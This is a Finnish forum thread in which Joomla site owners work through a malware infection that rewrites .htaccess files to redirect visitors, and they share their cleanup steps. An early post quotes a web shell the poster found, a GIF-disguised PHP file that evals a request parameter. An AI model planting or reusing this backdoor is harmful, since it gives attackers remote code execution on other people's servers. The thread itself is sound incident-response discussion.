.htaccess uudelleenohjaukset pöpösivuille

NonCoder kirjoitti: Kokeilin taas kaikkea mahdollista ja tutkin kaikki hakemistot.
Sivut oli taas siivottu, mutta 30-40min myöhemmin tilanne palautui samaksi.

Latasin äsken varmuuskopion omalle koneelle ja löysin stories kansiosta story.php:n mitä ei ainakaan uudessa Joomla asennuspaketissa ole?

GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>

Just sama versio tästä bakteerista kuin mulla. Äkkiä pois.

Muuten: Se ohje, että ihan ekaksi päivittää uuden version Joomlasta saattaa haitata tämän .htaccess-pöpön etsintää? Kun sitten ei niin helposti löydäkään viime päivinä muuttuneita .PHP -tiedostoja.

Juurikin näin, eli aluksi kannattaisi vaihtaa kaikki salasanat (ylläpito, ftp ja tietokanta), tämän jälkeen tutkia sivusto muuttuneiden tiedotojen osalta. Tämän jälkeen kun ne on poistettu / tiedostot siivottu, kannattaisi päivittää Joomla sekä kaikki lisäosat (komponentit, moduulit, liitännäiset ja sivupohjat).
Tuo äskeinen on järjestys jolla minä teen, mutta toki jollakin voi olla parempikin järjestys.

Tuossa tutkimisvaiheessa kannattaa tosiaan käydä laajasti sivusto läpi, sillä tuo pöpö voi olla oikeastaan missä vaan. Minä olen tavannut koodia juuri tuolla kuvakansiossa sekä sivupohjissa (myös niissä jotka eivät ole käytössä), mutta en näe syytä miksi se ei voisi tarttua muuallekin. Olen lukenut, että joskus myös htaccess tiedotoon on tullut muutoksia.

Admin Toolsissahan on uudehkona ominaisuutena PHP File Scanner. Hiukan työläs työkalu koska se käytännössä edellyttää uuden silmukan lisäämistä päivitysrutiiniin: varmuuuskopiointi, päivitys ja PHP file scan. Homma pitää aloittaa heti sivuston perustamisessa jotta pohjana on varmasti puhdas asennus, mutta kun jaksaa joka kerta mitä tahansa päivittäessään ajaa tuon aina lopuksi, voi sitten näissä tilanteissa pyöräyttää skannauksen ja löytää nopeasti muuttuneet tiedostot joita tutkia tarkemmin.

Meinaa toivo ja keinot loppua..

Kerkesin päivittää sivun ja otin varmuuskopion vasta sen jälkeen.
Voisin tietysti palauttaa yhden vanhimman kopion, koska sehän ei vaikuta artikkeleihin koska ne on kannassa ja palautan vain tiedostot ja komponentit.

Olen kokeillut vaihtaa kaikki salasanat ja latasin/purin koko sivuhakemiston koneelleni.
Kävin läpi kaikki tiedostot ja löysin vain tuon ylläolevan.
Tyhjensin serveriltä kaikki ja palautin puhdistetun sivuston, mutta sama homma jatkuu.

Ajastetut tehtävät (cron) yms yms olen tarkistanut, mutta joku skriptihän tuolla on koska se palauttaa muokatut tiedostot takaisin aina hetken päästä.

Poistan nyt kaikki tiedostot serveriltä, ja jätän vain tietokannan paikoilleen.
palautan vanhan varmuuskopion ja päivitän kaikki ajantasalle. Katsotaan miten käy.

NonCoder kirjoitti:
Olen kokeillut vaihtaa kaikki salasanat ja latasin/purin koko sivuhakemiston koneelleni.
Kävin läpi kaikki tiedostot ja löysin vain tuon ylläolevan.
Tyhjensin serveriltä kaikki ja palautin puhdistetun sivuston, mutta sama homma jatkuu.

Oletko ollut yhteydessä palveluntarjoajaan?
Mielestäni tilanteesi kuulostaa sellaiselta että on syytä epäillä että palvelin on hakkeroitu
Ja vaikka ei olisikaan niin palvelimen lokeista näkee paljon paremmin ja helpommin mitä tililläsi tapahtuu!

Kyllä olen ollut yhteydessä ja vastaus sieltä oli että todennäköisesti vanhentuneen Joomlan kautta päässeet tekemään temppunsa.

Palautan juuri nyt vanhaa ja varmasi puhdasta versiota, joten katsotaan miten käy.

Palautettu vanha kopio (12kk vanha) ja ajettu päivitykset Joomlaan + komponentteihin.
Vielä ei ole mitään tapahtunut, joten jokohan pöpöstä päästiin?

Kaikki on paikoillaan ja ok, mutta muutamia kuvatiedostoja puuttuu..

Minun yhdellä asiakkaalla oli sama homma. Muutin templaten 2.5 sopivaksi ja kopsasin sisällön. Meni 15 minuuttia. Ainoa pirulainen oli että heillä oli kansioita joita ei saanut ftp:llä poistaa joten tartunta pysyi senkin jälkeen kun olin 1.5 -> 2.5 päivittänyt. Asentelin JHackGuardin, Akeeba backupin sekä Admin toolsin ja poistin manuaalisesti kaikki .htaccess tiedostot. Voila!

Nyt pitäsi olla pomminvarma sivusto

Eilen katselin täältä foorumilta jotain perus kauraa aina suoritettavista toiminnoista mitä pitäisi Joomla sitelle tehdä kun asentelee nettiin ettei haxxata. Täytyypä oikein perehtyä kunnolla.

Minäkin törmäsin yhden palvelimen osalta .htaccess sekoiluun. Pääsin luultavasti jo oikeille jäljille etsimällä apache:n access.log:sta epäilyttäviä POST komentoja. Yksi osoitti aina tietyn ajoin …/joomla/images/banners kansioon ja siellä olevaan .cache alkuiseen php tiedostoon. Aina kun POST kutsu tapahtui, .htaccess tiedostot menivät ”sekaisin”.

Ajankohdasta pääsin selville tekemällä scriptin joka tarkkailee ajastetusti, muuttuuko .htaccess tiedostojen sisältö verrattuna alkuperäisiin ja jos muuttuu, palauttaa alkuperäiset paikoilleen ja hälyttää sähköpostiin.

Alun perin sisään on nähdäkseni tultu JCE:n kautta, joka oli vanha versio (1.5.7.4). Joomla itsessään 1.5 sarjaa. …/joomla/images/stories –kansioon oli ilmestynyt story.php ja .htaccess tiedosto. Sen jälkeen alkoi ilmetä ylimääräisiä post ja get kutsuja.

Poistin ylimääräiset tiedostot ja nyt tilanne näyttää rauhoittuneen.

Haluatko jakaa tuon scriptin?